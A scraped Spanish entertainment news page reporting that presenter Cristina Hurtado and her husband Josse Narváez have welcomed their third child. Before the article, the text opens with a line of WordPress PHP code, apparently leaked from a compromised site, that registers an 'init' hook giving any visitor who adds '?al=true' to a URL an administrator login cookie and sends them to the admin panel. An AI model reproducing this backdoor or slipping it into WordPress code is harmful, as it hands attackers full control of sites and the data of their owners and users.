// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Cristina Hurtado ya dio a luz y con tierna foto enamora a sus seguidores - Dicomania Tu Manía
ViralMania

Cristina Hurtado ya dio a luz y con tierna foto enamora a sus seguidores

La presentadora Cristina Hurtado y su esposo Josse Narváez hace una semana le dieron la bienvenida a su tercer hijo, por lo que habían estado un poco aislados de sus redes sociales, sin embargo; ambos presentadores publicaron una foto donde lucen bastante contentos por la llegada de su nuevo integrante.

El canal 1 donde trabajan Josse Narváez fue el primero en anunciar la llegada del hijo de la pareja y Maleja Restrepo quien es la actual presentadora del programa Guerreros dijo que Josse no había podido asistir a la final de la temporada porque ya su hijo estaba a punto de nacer.

Advertisements

Por la descripción de la publicación se sabe que su bebé nació el 09 de diciembre del presente año y sin duda alguna los comentarios de felicitaciones para esta pareja no tardaron en llegar, pues varios famosos comentaron y les desearon muchos éxitos a la familia Narváez Hurtado.

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

To Top